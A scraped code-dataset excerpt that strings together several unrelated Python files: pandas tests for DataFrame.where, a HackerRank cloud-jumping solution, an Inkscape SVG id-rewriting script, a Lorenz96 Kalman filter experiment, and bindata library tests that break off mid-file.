def test_where_axis(self):
# GH 9736
df = DataFrame(np.random.default_rng(2).standard_normal((2, 2)))
mask = DataFrame([[False, False], [False, False]])
ser = Series([0, 1])
expected = DataFrame([[0, 0], [1, 1]], dtype="float64")
result = df.where(mask, ser, axis="index")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, ser, axis="index", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
expected = DataFrame([[0, 1], [0, 1]], dtype="float64")
result = df.where(mask, ser, axis="columns")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, ser, axis="columns", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_axis_with_upcast(self):
# Upcast needed
df = DataFrame([[1, 2], [3, 4]], dtype="int64")
mask = DataFrame([[False, False], [False, False]])
ser = Series([0, np.nan])
expected = DataFrame([[0, 0], [np.nan, np.nan]], dtype="float64")
result = df.where(mask, ser, axis="index")
tm.assert_frame_equal(result, expected)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, ser, axis="index", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
expected = DataFrame([[0, np.nan], [0, np.nan]])
result = df.where(mask, ser, axis="columns")
tm.assert_frame_equal(result, expected)
expected = DataFrame(
{
0: np.array([0, 0], dtype="int64"),
1: np.array([np.nan, np.nan], dtype="float64"),
}
)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, ser, axis="columns", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_axis_multiple_dtypes(self):
# Multiple dtypes (=> multiple Blocks)
df = pd.concat(
[
DataFrame(np.random.default_rng(2).standard_normal((10, 2))),
DataFrame(
np.random.default_rng(2).integers(0, 10, size=(10, 2)),
dtype="int64",
),
],
ignore_index=True,
axis=1,
)
mask = DataFrame(False, columns=df.columns, index=df.index)
s1 = Series(1, index=df.columns)
s2 = Series(2, index=df.index)
result = df.where(mask, s1, axis="columns")
expected = DataFrame(1.0, columns=df.columns, index=df.index)
expected[2] = expected[2].astype("int64")
expected[3] = expected[3].astype("int64")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, s1, axis="columns", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
result = df.where(mask, s2, axis="index")
expected = DataFrame(2.0, columns=df.columns, index=df.index)
expected[2] = expected[2].astype("int64")
expected[3] = expected[3].astype("int64")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, s2, axis="index", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
# DataFrame vs DataFrame
d1 = df.copy().drop(1, axis=0)
# Explicit cast to avoid implicit cast when setting value to np.nan
expected = df.copy().astype("float")
expected.loc[1, :] = np.nan
result = df.where(mask, d1)
tm.assert_frame_equal(result, expected)
result = df.where(mask, d1, axis="index")
tm.assert_frame_equal(result, expected)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, d1, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, d1, inplace=True, axis="index")
assert return_value is None
tm.assert_frame_equal(result, expected)
d2 = df.copy().drop(1, axis=1)
expected = df.copy()
expected.loc[:, 1] = np.nan
result = df.where(mask, d2)
tm.assert_frame_equal(result, expected)
result = df.where(mask, d2, axis="columns")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, d2, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, d2, inplace=True, axis="columns")
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_callable(self):
# GH 12533
df = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
result = df.where(lambda x: x > 4, lambda x: x + 1)
exp = DataFrame([[2, 3, 4], [5, 5, 6], [7, 8, 9]])
tm.assert_frame_equal(result, exp)
tm.assert_frame_equal(result, df.where(df > 4, df + 1))
# return ndarray and scalar
result = df.where(lambda x: (x % 2 == 0).values, lambda x: 99)
exp = DataFrame([[99, 2, 99], [4, 99, 6], [99, 8, 99]])
tm.assert_frame_equal(result, exp)
tm.assert_frame_equal(result, df.where(df % 2 == 0, 99))
# chain
result = (df + 2).where(lambda x: x > 8, lambda x: x + 10)
exp = DataFrame([[13, 14, 15], [16, 17, 18], [9, 10, 11]])
tm.assert_frame_equal(result, exp)
tm.assert_frame_equal(result, (df + 2).where((df + 2) > 8, (df + 2) + 10))
def test_where_tz_values(self, tz_naive_fixture, frame_or_series):
obj1 = DataFrame(
DatetimeIndex(["20150101", "20150102", "20150103"], tz=tz_naive_fixture),
columns=["date"],
)
obj2 = DataFrame(
DatetimeIndex(["20150103", "20150104", "20150105"], tz=tz_naive_fixture),
columns=["date"],
)
mask = DataFrame([True, True, False], columns=["date"])
exp = DataFrame(
DatetimeIndex(["20150101", "20150102", "20150105"], tz=tz_naive_fixture),
columns=["date"],
)
if frame_or_series is Series:
obj1 = obj1["date"]
obj2 = obj2["date"]
mask = mask["date"]
exp = exp["date"]
result = obj1.where(mask, obj2)
tm.assert_equal(exp, result)
def test_df_where_change_dtype(self):
# GH#16979
df = DataFrame(np.arange(2 * 3).reshape(2, 3), columns=list("ABC"))
mask = np.array([[True, False, False], [False, False, True]])
result = df.where(mask)
expected = DataFrame(
[[0, np.nan, np.nan], [np.nan, np.nan, 5]], columns=list("ABC")
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [{}, {"other": None}])
def test_df_where_with_category(self, kwargs):
# GH#16979
data = np.arange(2 * 3, dtype=np.int64).reshape(2, 3)
df = DataFrame(data, columns=list("ABC"))
mask = np.array([[True, False, False], [False, False, True]])
# change type to category
df.A = df.A.astype("category")
df.B = df.B.astype("category")
df.C = df.C.astype("category")
result = df.where(mask, **kwargs)
A = pd.Categorical([0, np.nan], categories=[0, 3])
B = pd.Categorical([np.nan, np.nan], categories=[1, 4])
C = pd.Categorical([np.nan, 5], categories=[2, 5])
expected = DataFrame({"A": A, "B": B, "C": C})
tm.assert_frame_equal(result, expected)
# Check Series.where while we're here
result = df.A.where(mask[:, 0], **kwargs)
expected = Series(A, name="A")
tm.assert_series_equal(result, expected)
def test_where_categorical_filtering(self):
# GH#22609 Verify filtering operations on DataFrames with categorical Series
df = DataFrame(data=[[0, 0], [1, 1]], columns=["a", "b"])
df["b"] = df["b"].astype("category")
result = df.where(df["a"] > 0)
# Explicitly cast to 'float' to avoid implicit cast when setting np.nan
expected = df.copy().astype({"a": "float"})
expected.loc[0, :] = np.nan
tm.assert_equal(result, expected)
def test_where_ea_other(self):
# GH#38729/GH#38742
df = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
arr = pd.array([7, pd.NA, 9])
ser = Series(arr)
mask = np.ones(df.shape, dtype=bool)
mask[1, :] = False
# TODO: ideally we would get Int64 instead of object
result = df.where(mask, ser, axis=0)
expected = DataFrame({"A": [1, pd.NA, 3], "B": [4, pd.NA, 6]}).astype(object)
tm.assert_frame_equal(result, expected)
ser2 = Series(arr[:2], index=["A", "B"])
expected = DataFrame({"A": [1, 7, 3], "B": [4, pd.NA, 6]})
expected["B"] = expected["B"].astype(object)
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
result = df.where(mask, ser2, axis=1)
tm.assert_frame_equal(result, expected)
def test_where_interval_noop(self):
# GH#44181
df = DataFrame([pd.Interval(0, 0)])
res = df.where(df.notna())
tm.assert_frame_equal(res, df)
ser = df[0]
res = ser.where(ser.notna())
tm.assert_series_equal(res, ser)
def test_where_interval_fullop_downcast(self, frame_or_series):
# GH#45768
obj = frame_or_series([pd.Interval(0, 0)] * 2)
other = frame_or_series([1.0, 2.0])
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
res = obj.where(~obj.notna(), other)
# since all entries are being changed, we will downcast result
# from object to ints (not floats)
tm.assert_equal(res, other.astype(np.int64))
# unlike where, Block.putmask does not downcast
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
obj.mask(obj.notna(), other, inplace=True)
tm.assert_equal(obj, other.astype(object))
@pytest.mark.parametrize(
"dtype",
[
"timedelta64[ns]",
"datetime64[ns]",
"datetime64[ns, Asia/Tokyo]",
"Period[D]",
],
)
def test_where_datetimelike_noop(self, dtype):
# GH#45135, analogue to GH#44181 for Period don't raise on no-op
# For td64/dt64/dt64tz we already don't raise, but also are
# checking that we don't unnecessarily upcast to object.
with tm.assert_produces_warning(FutureWarning, match="is deprecated"):
ser = Series(np.arange(3) * 10**9, dtype=np.int64).view(dtype)
df = ser.to_frame()
mask = np.array([False, False, False])
res = ser.where(~mask, "foo")
tm.assert_series_equal(res, ser)
mask2 = mask.reshape(-1, 1)
res2 = df.where(~mask2, "foo")
tm.assert_frame_equal(res2, df)
res3 = ser.mask(mask, "foo")
tm.assert_series_equal(res3, ser)
res4 = df.mask(mask2, "foo")
tm.assert_frame_equal(res4, df)
# opposite case where we are replacing *all* values -> we downcast
# from object dtype # GH#45768
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
res5 = df.where(mask2, 4)
expected = DataFrame(4, index=df.index, columns=df.columns)
tm.assert_frame_equal(res5, expected)
# unlike where, Block.putmask does not downcast
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
df.mask(~mask2, 4, inplace=True)
tm.assert_frame_equal(df, expected.astype(object))
def test_where_int_downcasting_deprecated():
# GH#44597
arr = np.arange(6).astype(np.int16).reshape(3, 2)
df = DataFrame(arr)
mask = np.zeros(arr.shape, dtype=bool)
mask[:, 0] = True
res = df.where(mask, 2**17)
expected = DataFrame({0: arr[:, 0], 1: np.array([2**17] * 3, dtype=np.int32)})
tm.assert_frame_equal(res, expected)
def test_where_copies_with_noop(frame_or_series):
# GH-39595
result = frame_or_series([1, 2, 3, 4])
expected = result.copy()
col = result[0] if frame_or_series is DataFrame else result
where_res = result.where(col < 5)
where_res *= 2
tm.assert_equal(result, expected)
where_res = result.where(col > 5, [1, 2, 3, 4])
where_res *= 2
tm.assert_equal(result, expected)
def test_where_string_dtype(frame_or_series):
# GH40824
obj = frame_or_series(
["a", "b", "c", "d"], index=["id1", "id2", "id3", "id4"], dtype=StringDtype()
)
filtered_obj = frame_or_series(
["b", "c"], index=["id2", "id3"], dtype=StringDtype()
)
filter_ser = Series([False, True, True, False])
result = obj.where(filter_ser, filtered_obj)
expected = frame_or_series(
[pd.NA, "b", "c", pd.NA],
index=["id1", "id2", "id3", "id4"],
dtype=StringDtype(),
)
tm.assert_equal(result, expected)
result = obj.mask(~filter_ser, filtered_obj)
tm.assert_equal(result, expected)
obj.mask(~filter_ser, filtered_obj, inplace=True)
tm.assert_equal(result, expected)
def test_where_bool_comparison():
# GH 10336
df_mask = DataFrame(
{"AAA": [True] * 4, "BBB": [False] * 4, "CCC": [True, False, True, False]}
)
result = df_mask.where(df_mask == False) # noqa: E712
expected = DataFrame(
{
"AAA": np.array([np.nan] * 4, dtype=object),
"BBB": [False] * 4,
"CCC": [np.nan, False, np.nan, False],
}
)
tm.assert_frame_equal(result, expected)
def test_where_none_nan_coerce():
# GH 15613
expected = DataFrame(
{
"A": [Timestamp("20130101"), pd.NaT, Timestamp("20130103")],
"B": [1, 2, np.nan],
}
)
result = expected.where(expected.notnull(), None)
tm.assert_frame_equal(result, expected)
def test_where_duplicate_axes_mixed_dtypes():
# GH 25399, verify manually masking is not affected anymore by dtype of column for
# duplicate axes.
result = DataFrame(data=[[0, np.nan]], columns=Index(["A", "A"]))
index, columns = result.axes
mask = DataFrame(data=[[True, True]], columns=columns, index=index)
a = result.astype(object).where(mask)
b = result.astype("f8").where(mask)
c = result.T.where(mask.T).T
d = result.where(mask) # used to fail with "cannot reindex from a duplicate axis"
tm.assert_frame_equal(a.astype("f8"), b.astype("f8"))
tm.assert_frame_equal(b.astype("f8"), c.astype("f8"))
tm.assert_frame_equal(c.astype("f8"), d.astype("f8"))
def test_where_columns_casting():
# GH 42295
df = DataFrame({"a": [1.0, 2.0], "b": [3, np.nan]})
expected = df.copy()
result = df.where(pd.notnull(df), None)
# make sure dtypes don't change
tm.assert_frame_equal(expected, result)
@pytest.mark.parametrize("as_cat", [True, False])
def test_where_period_invalid_na(frame_or_series, as_cat, request):
# GH#44697
idx = pd.period_range("2016-01-01", periods=3, freq="D")
if as_cat:
idx = idx.astype("category")
obj = frame_or_series(idx)
# NA value that we should *not* cast to Period dtype
tdnat = pd.NaT.to_numpy("m8[ns]")
mask = np.array([True, True, False], ndmin=obj.ndim).T
if as_cat:
msg = (
r"Cannot setitem on a Categorical with a new category \(NaT\), "
"set the categories first"
)
else:
msg = "value should be a 'Period'"
if as_cat:
with pytest.raises(TypeError, match=msg):
obj.where(mask, tdnat)
with pytest.raises(TypeError, match=msg):
obj.mask(mask, tdnat)
with pytest.raises(TypeError, match=msg):
obj.mask(mask, tdnat, inplace=True)
else:
# With PeriodDtype, ser[i] = tdnat coerces instead of raising,
# so for consistency, ser[mask] = tdnat must as well
expected = obj.astype(object).where(mask, tdnat)
result = obj.where(mask, tdnat)
tm.assert_equal(result, expected)
expected = obj.astype(object).mask(mask, tdnat)
result = obj.mask(mask, tdnat)
tm.assert_equal(result, expected)
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
obj.mask(mask, tdnat, inplace=True)
tm.assert_equal(obj, expected)
def test_where_nullable_invalid_na(frame_or_series, any_numeric_ea_dtype):
# GH#44697
arr = pd.array([1, 2, 3], dtype=any_numeric_ea_dtype)
obj = frame_or_series(arr)
mask = np.array([True, True, False], ndmin=obj.ndim).T
msg = r"Invalid value '.*' for dtype (U?Int|Float)\d{1,2}"
for null in tm.NP_NAT_OBJECTS + [pd.NaT]:
# NaT is an NA value that we should *not* cast to pd.NA dtype
with pytest.raises(TypeError, match=msg):
obj.where(mask, null)
with pytest.raises(TypeError, match=msg):
obj.mask(mask, null)
@given(data=OPTIONAL_ONE_OF_ALL)
def test_where_inplace_casting(data):
# GH 22051
df = DataFrame({"a": data})
df_copy = df.where(pd.notnull(df), None).copy()
df.where(pd.notnull(df), None, inplace=True)
tm.assert_equal(df, df_copy)
def test_where_downcast_to_td64():
ser = Series([1, 2, 3])
mask = np.array([False, False, False])
td = pd.Timedelta(days=1)
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
res = ser.where(mask, td)
expected = Series([td, td, td], dtype="m8[ns]")
tm.assert_series_equal(res, expected)
with pd.option_context("future.no_silent_downcasting", True):
with tm.assert_produces_warning(None, match=msg):
res2 = ser.where(mask, td)
expected2 = expected.astype(object)
tm.assert_series_equal(res2, expected2)
def _check_where_equivalences(df, mask, other, expected):
# similar to tests.series.indexing.test_setitem.SetitemCastingEquivalences
# but with DataFrame in mind and less fleshed-out
res = df.where(mask, other)
tm.assert_frame_equal(res, expected)
res = df.mask(~mask, other)
tm.assert_frame_equal(res, expected)
# Note: frame.mask(~mask, other, inplace=True) takes some more work bc
# Block.putmask does *not* downcast. The change to 'expected' here
# is specific to the cases in test_where_dt64_2d.
df = df.copy()
df.mask(~mask, other, inplace=True)
if not mask.all():
# with mask.all(), Block.putmask is a no-op, so does not downcast
expected = expected.copy()
expected["A"] = expected["A"].astype(object)
tm.assert_frame_equal(df, expected)
def test_where_dt64_2d():
dti = date_range("2016-01-01", periods=6)
dta = dti._data.reshape(3, 2)
other = dta - dta[0, 0]
df = DataFrame(dta, columns=["A", "B"])
mask = np.asarray(df.isna()).copy()
mask[:, 1] = True
# setting all of one column, none of the other
expected = DataFrame({"A": other[:, 0], "B": dta[:, 1]})
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
_check_where_equivalences(df, mask, other, expected)
# setting part of one column, none of the other
mask[1, 0] = True
expected = DataFrame(
{
"A": np.array([other[0, 0], dta[1, 0], other[2, 0]], dtype=object),
"B": dta[:, 1],
}
)
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
_check_where_equivalences(df, mask, other, expected)
# setting nothing in either column
mask[:] = True
expected = df
_check_where_equivalences(df, mask, other, expected)
def test_where_producing_ea_cond_for_np_dtype():
# GH#44014
df = DataFrame({"a": Series([1, pd.NA, 2], dtype="Int64"), "b": [1, 2, 3]})
result = df.where(lambda x: x.apply(lambda y: y > 1, axis=1))
expected = DataFrame(
{"a": Series([pd.NA, pd.NA, 2], dtype="Int64"), "b": [np.nan, 2, 3]}
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"replacement", [0.001, True, "snake", None, datetime(2022, 5, 4)]
)
def test_where_int_overflow(replacement):
# GH 31687
df = DataFrame([[1.0, 2e25, "nine"], [np.nan, 0.1, None]])
result = df.where(pd.notnull(df), replacement)
expected = DataFrame([[1.0, 2e25, "nine"], [replacement, 0.1, replacement]])
tm.assert_frame_equal(result, expected)
def test_where_inplace_no_other():
# GH#51685
df = DataFrame({"a": [1.0, 2.0], "b": ["x", "y"]})
cond = DataFrame({"a": [True, False], "b": [False, True]})
df.where(cond, inplace=True)
expected = DataFrame({"a": [1, np.nan], "b": [np.nan, "y"]})
tm.assert_frame_equal(df, expected)
| pandas-dev/pandas | pandas/tests/frame/indexing/test_where.py | test_where.py | py | 38,120 | python | en | code | 40,398 | github-code | 90 |
9405251113 | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the jumpingOnClouds function below.
def jumpingOnClouds(c):
count, step_now = 0, 0
done = False
while not done:
if step_now+2 > (len(c) - 1) and c[step_now+1] != 1:
count += 1
done = True
elif step_now+2 <= (len(c) - 1):
if (c[step_now+1] != 1 and c[step_now+2] != 1) or (c[step_now+1] == 1 and c[step_now+2] != 1):
step_now += 2
count += 1
elif (c[step_now+1] != 1 and c[step_now+2] == 1):
step_now += 1
count += 1
if step_now == (len(c) - 1):
done = True
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
c = list(map(int, input().rstrip().split()))
result = jumpingOnClouds(c)
fptr.write(str(result) + '\n')
fptr.close()
| qwe12345113/HackerRank | Warm-up Challenges/Jumping on the Clouds.py | Jumping on the Clouds.py | py | 1,001 | python | en | code | 0 | github-code | 90 |
18446812019 | def count_section_by_zero(data):
count = 0
flg = False
start = 0
for i, d in enumerate(data):
if flg is False and d != 0:
count += 1
flg = True
if d == 0:
flg = False
return count
def input_list():
return list(map(int, input().split()))
def input_list_str():
return map(str, input().split())
def lcm_base(x, y):
return (x * y) // fractions.gcd(x, y)
def lcm_list(numbers):
return reduce(lcm_base, numbers, 1)
def gcd(*numbers):
return reduce(fractions.gcd, numbers)
def gcd_list(numbers):
return reduce(fractions.gcd, numbers)
# 2で割り切れる回数
def divide_two(arg):
c = 0
while True:
if c >= 2:
break
if arg % 2 != 0:
break
arg //= 2
c += 1
return c
# 素因数分解
def prime_factorize(n):
a = []
while n % 2 == 0:
a.append(2)
n //= 2
f = 3
while f * f <= n:
if n % f == 0:
a.append(f)
n //= f
else:
f += 2
if n != 1:
a.append(n)
return a
def main():
k, a, b = input_list()
ans = 1
lf = max(0, k - a+1)
lf1 = lf//2
if lf:
ans = a + lf1 * (b - a) + lf%2
else:
ans +k
print(max(ans, k+1))
import math
import fractions
import collections
from functools import reduce
main() | Aasthaengg/IBMdataset | Python_codes/p03131/s084085095.py | s084085095.py | py | 1,316 | python | en | code | 0 | github-code | 90 |
18275437499 | N = input()
K = int(input())
if len(N) < K:
print(0)
exit()
keta = []
for k in range(len(N)):
keta.append(int(N[-k-1]))
ans = [1, keta[0], 0, 0];
def combination(N,K):
if N < K:
return 0
else:
p = 1
for k in range(K):
p *= N
N -= 1
for k in range(1, K+1):
p //= k
return p
for k in range(1, len(N)-1):
if keta[k] > 0:
a = [1, 0, 0, 0]
for j in range(1, 4):
a[j] += (9**(j))*combination(k, j)
a[j] += (keta[k]-1)*combination(k, j-1)*(9**(j-1)) + ans[j-1]
ans = [] + a
answer = (9**(K))*combination(len(N)-1, K)
answer += (keta[-1]-1)*(9**(K-1))*combination(len(N)-1, K-1)
answer += ans[K-1]
print(answer) | Aasthaengg/IBMdataset | Python_codes/p02781/s740622120.py | s740622120.py | py | 680 | python | en | code | 0 | github-code | 90 |
17660697181 | import xml.dom.minidom
dom = xml.dom.minidom.parse('HPC发端模型.svg') #打开svg文档(这里将SVG和脚本放到一个目录)
root = dom.documentElement #得到文档元素对象
gList = root.getElementsByTagName('g') #得到所有g标签
pathList = root.getElementsByTagName('path') #得到所有path标签
rectList = root.getElementsByTagName('rect') #得到所有rect标签
textList = root.getElementsByTagName('text') #得到所有text标签
# 设置g
for index in range(len(gList)):
label = gList[index].getAttribute('inkscape:label')
if gList[index].hasAttribute('inkscape:label'):
# id = gList[index].getAttribute('id')
gList[index].setAttribute('id',label[1:])
# 设置path
for index in range(len(pathList)):
label = pathList[index].getAttribute('inkscape:label')
if pathList[index].hasAttribute('inkscape:label'):
# id = pathList[index].getAttribute('id')
pathList[index].setAttribute('id',label[1:])
# 设置rect
for index in range(len(rectList)):
label = rectList[index].getAttribute('inkscape:label')
if rectList[index].hasAttribute('inkscape:label'):
# id = rectList[index].getAttribute('id')
rectList[index].setAttribute('id',label[1:])
# 设置text
for index in range(len(textList)):
label = textList[index].getAttribute('inkscape:label')
if textList[index].hasAttribute('inkscape:label'):
# id = textList[index].getAttribute('id')
textList[index].setAttribute('id',label[1:])
'''
将文档进行重写,注意文档中内容含有中文的情况
open()函数默认是文本模式打开,也就是ANSII编码
在简体中文系统下,ANSII编码代表 GB2312 编码
'''
with open('HPC发端模型.svg', 'w', encoding='utf-8') as f:
# 缩进 - 换行 - 编码
dom.writexml(f, addindent='', encoding='utf-8') | Robert30-xl/SVG-setAttribute-for-Inkscape | setAttribute.py | setAttribute.py | py | 1,863 | python | zh | code | 1 | github-code | 90 |
11359692135 | #%%
import numpy as np
import matplotlib.pyplot as plt
import lorenz96 as l96
import json
#%%
json_file = open("parameter.json","r")
json_data = json.load(json_file)
N = np.int(json_data["N"]) # Number of variables
F = np.int(json_data["F"]) # Forcing
AW = np.float(json_data["AW"])
ADAY = np.float(json_data["ADAY"])
YEAR = np.int(json_data["YEAR"])
#%%
#時間発展の線形性を利用して近似的に求める
def jacobian(x):
d = 1e-4
Jacob = np.zeros((N, N))
xb = l96.short_run(x)
for i in range(N):
xe = np.zeros(N)
xe[:] = x[:]
xe[i] = x[i] + d
xa = l96.short_run(xe) #誤差あり
Jacob[:, i] = (xa[:] - xb[:]) / d
return Jacob
#%%
def read_data():
obs = np.fromfile("obs.bin",dtype=np.float32)
obs = obs.reshape(int(len(obs)/N), N)
print("##### Read Observation Data #####")
print("Observation Data shape : ",obs.shape)
control = np.fromfile("control.bin",dtype=np.float32)
control = control.reshape(int(len(control)/N), N)
print("##### Read Control Run Data #####")
print("Control Run Data shape : ",obs.shape)
true = np.fromfile("spinup.bin",dtype=np.float32)
true = true.reshape(int(len(true)/N), N)
print("##### Read True Value Data #####")
print("True Value Data shape : ",obs.shape)
return obs, control, true
obs, control, true = read_data()
#%%Kalman Filter
initial_Pa = np.identity(N) * 1e+1
#観測に欠損値はないので観測演算子は単位行列でOK
#%%
def kalman_filter(Xa, Pa, obs, delta=0.1, H=np.identity(N), R=np.identity(N)):
#予報
Xf = l96.short_run(Xa)
#カルマンゲインの計算
M = jacobian(Xa)
Pf = ( 1 + delta ) * M @ Pa @ M.T
K = Pf @ H.T @ np.linalg.inv(H @ Pf @ H.T +R)
#解析値の計算
Xa = Xf + K @ (obs - H @ Xf)
Pa = (np.identity(N) - K @ H) @ Pf
return Xa, Pa
#%%
def exec():
Pa0 = np.identity(N) + 1e+1
Xa0 = control[0,:]
pa = Pa0
xa = Xa0
Xa = []
Pa = []
for t in range(int((YEAR/2) * 365 * (24/AW))-1):
print("Time Step {}".format(t))
Xa.append(xa)
Pa.append(pa)
xa, pa= kalman_filter(xa, pa, obs[t+1, :])
Xa = np.array(Xa)
Pa = np.array(Pa)
print(" Fnish Calculate Xa : ", Xa.shape)
print(" Fnish Calculate Pa : ", Pa.shape)
return Xa, Pa
Xa, Pa = exec()
#%%
plt.title("X1")
plt.plot(control[0:200,0],label="Control")
plt.plot(Xa[0:200,0],label="Analysis")
plt.plot(true[0:200,0],label="True")
plt.plot(obs[0:200,0])
plt.xlabel("Step ( /6h)")
plt.legend()
#plt.plot(obs[:,0])
#%%
def calc_rmse(data1, data2):
RMSE = []
for i in range(len(data1[:,0])):
rmse = np.sqrt(np.mean((data1[i,:] - data2[i,:]) ** 2))
RMSE.append(rmse)
return RMSE
#%%
RMSE1 = calc_rmse(control, true)
RMSE2 = calc_rmse(Xa, true)
RMSE3 = calc_rmse(obs, true)
plt.title("RMSE (vs True)")
plt.plot(RMSE1, label="Control")
plt.plot(RMSE2, label="Anlysis")
plt.plot(RMSE3, label="Observation")
plt.xlabel("Step ( /6h )")
plt.legend()
plt.savefig("non_delta.png",tight_layout=True, dpi=500)
#%%
"""
if(__name__ == "__main__"):
start = time.time()
main()
elapsed = time.time() - start
print("Elapsed Time : ",elapsed)
"""
# %%
| sc2xos/Met | DA/kalman_filter.py | kalman_filter.py | py | 3,360 | python | en | code | 0 | github-code | 90 |
7108268342 | """ Created on 23/07/2022::
------------- test_all.py -------------
**Authors**: L. Mingarelli
"""
import numpy as np
from bindata.check_commonprob import check_commonprob
from bindata import (commonprob2sigma,
condprob,
bincorr2commonprob,
ra2ba,
rmvbin
)
from bindata.simul_commonprob import simul_commonprob
class Tests:
def test_check_commonprob(self):
flag, msg = check_commonprob([[0.5, 0.4],
[0.4, 0.8]])
assert flag
flag, msg = check_commonprob([[0.5, 0.25],
[0.25, 0.8]])
assert not flag
assert msg[0].startswith('Error in Element (0, 1): Admissible values are')
flag, msg = check_commonprob([[0.5, 0, 0],
[0, 0.5, 0],
[0, 0, 0.5]])
assert not flag
assert msg[0].startswith('The sum of the common probabilities of 0, 1, 2')
def test_bincorr2commonprob(self):
margprob = np.array([0.3, 0.9])
bincorr = np.eye(len(margprob))
commonprob = bincorr2commonprob(margprob, bincorr)
assert np.isclose(commonprob, np.array([[0.3 , 0.27],
[0.27, 0.9 ]])).all()
def test_commonprob2sigma(self):
m = [[1/2, 1/5, 1/6],
[1/5, 1/2, 1/6],
[1/6, 1/6, 1/2]]
Σ = commonprob2sigma(commonprob=m)
Σ2 = commonprob2sigma(commonprob=m, par=True)
assert (Σ == np.array([[ 1. , -0.3088814758080922, -0.500114775383386],
[-0.3088814758080922, 1. , -0.500114775383386],
[-0.500114775383386, -0.500114775383386, 1. ]])).all()
assert (Σ == Σ2).all()
def test_condprob(self):
x = np.array([[0,1], [1,1], [0,0], [0,0], [1,0], [1,1]])
expected_res = np.array([[1, 2/3],
[2/3, 1]])
assert np.isclose(condprob(x), expected_res).all()
np.random.seed(0)
x = np.random.binomial(1, 0.5, (1_000_000, 2))
expected_res = np.array([[1, 0.5013397165515436],
[ 0.5011774904572338, 1]])
assert np.isclose(condprob(x), expected_res).all()
def test_ra2ba(self):
np.random.seed(0)
x = np.random.normal(0,1, (2, 5))
expected_res = np.array([[ True, True, True, True, True],
[False, True, False, False, True]])
assert (ra2ba(x)==expected_res).all()
def test_rmvbin(self):
corr = np.array([[1., -0.25, -0.0625],
[-0.25, 1., 0.25],
[-0.0625, 0.250, 1.]])
commonprob = bincorr2commonprob(margprob=[0.2, 0.5, 0.8], bincorr=corr)
sample = rmvbin(margprob=np.diag(commonprob), commonprob=commonprob, N=10_000_000)
realised_corr = np.corrcoef(sample, rowvar=False)
np.abs(corr - realised_corr)
assert np.isclose(corr, realised_corr, rtol=1e-4, atol=2e-3).all()
def test_rmvbin2(self):
N = 10_000_000
# Uncorrelated columns:
margprob = [0.3, 0.9]
X = rmvbin(N=N, margprob=margprob)
assert np.isclose(X.mean(0), margprob, rtol=1e-4, atol=2e-3).all()
assert np.isclose(np.corrcoef(X, rowvar=False), np.eye(2), rtol=1e-4, atol=2e-3).all()
# Correlated columns
m = [[1/2, 1/5, 1/6],
[1/5, 1/2, 1/6],
[1/6, 1/6, 1/2]]
X = rmvbin(N=N, commonprob=m)
assert np.isclose(X.mean(0), np.diagonal(m), rtol=1e-4, atol=2e-3).all()
assert np.isclose(np.corrcoef(X, rowvar=False),
np.array([[ 1. , -0.19966241, -0.33318569],
[-0.19966241, 1. , -0.33377646],
[-0.33318569, -0.33377646, 1. ]]),
rtol=1e-4, atol=2e-3).all()
# Same as the example above, but faster if the same probabilities are
# used repeatedly
sigma = commonprob2sigma(m)
X = rmvbin(N=N, margprob=np.diagonal(m), sigma=sigma)
assert np.isclose(X.mean(0), np.diagonal(m), rtol=1e-4, atol=2e-3).all()
assert np.isclose(np.corrcoef(X, rowvar=False),
np.array([[ 1. , -0.19966241, -0.33318569],
[-0.19966241, 1. , -0.33377646],
[-0.33318569, -0.33377646, 1. ]]),
rtol=1e-4, atol=2e-3).all()
def test_rmvbin3(self):
N = 10_000
p_d = 0.1
corr = 0.1
a, b = rmvbin(N=N, margprob=[p_d, p_d],
bincorr=[[1, corr],
[corr, 1]]).T
def test_simul_commonprob(self):
margprob = np.arange(0, 1.5, 0.5)
corr = np.arange(-1, 1.5, 0.5)
np.random.seed(0)
Z = simul_commonprob(margprob=margprob,
corr=corr,
method="monte carlo", n1=10**4)
expected_Z = {(0.0, 0.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
